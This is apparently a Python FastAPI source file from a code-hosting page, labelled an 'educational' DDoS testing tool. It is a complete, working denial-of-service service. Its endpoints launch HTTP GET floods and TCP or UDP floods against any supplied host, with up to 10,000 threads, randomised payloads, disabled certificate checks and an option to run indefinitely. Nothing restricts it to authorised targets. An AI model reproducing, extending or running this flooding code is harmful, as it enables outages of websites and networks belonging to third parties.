File size: 4,963 Bytes
f39ffbb f707f27 8df8350 76c30e9 8df8350 faf62e8 8df8350 faf62e8 76c30e9 f39ffbb 8df8350 76c30e9 f39ffbb f707f27 76c30e9 f707f27 8df8350 f707f27 8df8350 f707f27 8df8350 f707f27 8df8350 76c30e9 faf62e8 8df8350 f39ffbb a246d27 76c30e9 a246d27 76c30e9 f39ffbb 76c30e9 f39ffbb a246d27 f39ffbb 8df8350 faf62e8 a246d27 8df8350 a246d27 8df8350 76c30e9 8df8350 faf62e8 a246d27 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 |
# main.py
import uvicorn
from fastapi import FastAPI, HTTPException
from pydantic import BaseModel
import threading
import requests
import time
import logging
import socket
import random
import struct
from typing import Optional, Literal
from concurrent.futures import ThreadPoolExecutor
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
app = FastAPI(title="Layer 7 + Layer 4 DDoS Testing Tool (Educational Only)")
# Global attack control
attack_active = False
attack_thread = None
executor = ThreadPoolExecutor(max_workers=10000) # Maximum power mode
class AttackConfig(BaseModel):
target: str
port: int = 80
duration: int = 30 # -1 for unlimited
threads: int = 100 # -1 for unlimited
attack_type: Literal["layer7", "tcp", "udp"] = "layer7"
payload_size: int = 1024 # For Layer 4 attacks
def generate_payload(size: int) -> bytes:
"""Generate random payload for Layer 4 attacks"""
return bytes(random.getrandbits(8) for _ in range(size))
def layer7_attack(target_url: str):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"Cache-Control": "no-cache",
"Pragma": "no-cache"
}
session = requests.Session()
while attack_active:
try:
session.get(target_url, headers=headers, timeout=5, verify=False)
except:
pass
def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int):
sock = None
try:
if protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((target_ip, port))
else: # udp
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while attack_active:
payload = generate_payload(payload_size)
if protocol == "tcp":
sock.send(payload)
else:
sock.sendto(payload, (target_ip, port))
time.sleep(0.01) # Small delay to prevent CPU overload
except Exception as e:
logger.error(f"Layer 4 attack error: {e}")
finally:
if sock:
sock.close()
def start_attack(config: AttackConfig):
global attack_active, attack_thread
attack_active = True
# Determine thread count
thread_count = config.threads if config.threads != -1 else 10000
# Build target URL for Layer 7
if config.attack_type == "layer7":
protocol = "https" if config.target.startswith("https") else "http"
target_url = f"{config.target}:{config.port}"
logger.info(f"Starting Layer 7 attack on {target_url} with {thread_count} threads")
for _ in range(thread_count):
executor.submit(layer7_attack, target_url)
else:
# Extract IP from target URL if needed
try:
target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0])
except:
raise HTTPException(status_code=400, detail="Invalid target URL")
logger.info(f"Starting {config.attack_type.upper()} attack on {target_ip}:{config.port} with {thread_count} threads")
for _ in range(thread_count):
executor.submit(layer4_attack, target_ip, config.port, config.attack_type, config.payload_size)
# Handle unlimited duration (-1)
if config.duration != -1:
time.sleep(config.duration)
stop_attack()
else:
logger.info("Attack running indefinitely until manually stopped")
def stop_attack():
global attack_active
attack_active = False
logger.info("Attack stopped.")
@app.post("/attack")
def launch_attack(config: AttackConfig):
global attack_thread
if attack_thread and attack_thread.is_alive():
raise HTTPException(status_code=400, detail="Attack already in progress")
# Validate thread count
if config.threads != -1 and config.threads > 10000:
raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)")
# Validate duration
if config.duration != -1 and config.duration > 5000:
raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)")
# Validate payload size
if config.payload_size > 65507:
raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes")
attack_thread = threading.Thread(target=start_attack, args=(config,), daemon=True)
attack_thread.start()
return {"status": "attack_started", "config": config}
@app.post("/stop")
def stop():
stop_attack()
return {"status": "attack_stopped"}
@app.get("/status")
def status():
return {"attack_active": attack_active}
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000)
|